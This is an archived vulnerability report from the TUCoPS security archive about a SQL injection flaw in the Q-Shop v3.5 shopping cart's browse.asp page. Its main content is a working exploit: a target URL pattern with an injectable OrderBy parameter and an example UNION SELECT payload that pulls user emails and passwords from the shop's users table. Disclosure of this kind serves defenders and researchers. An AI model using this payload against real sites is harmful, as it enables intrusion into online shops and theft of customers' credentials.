TUCoPS :: Web :: e-commerce, shopping carts :: b06-4770.htm

Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability



Vulnerability Report=0D
*******************************************************************************=0D
# Title  :  Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability=0D
=0D
# Author :   ajann=0D
=0D
# Script Page : http://quadcomm.com=0D 
=0D
# Exploit;=0D
=0D
*******************************************************************************=0D
=0D
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]=0D 
=0D
Example: browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users=0D
=0D
# ajann,Turkey!Muslim=0D
# ...

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH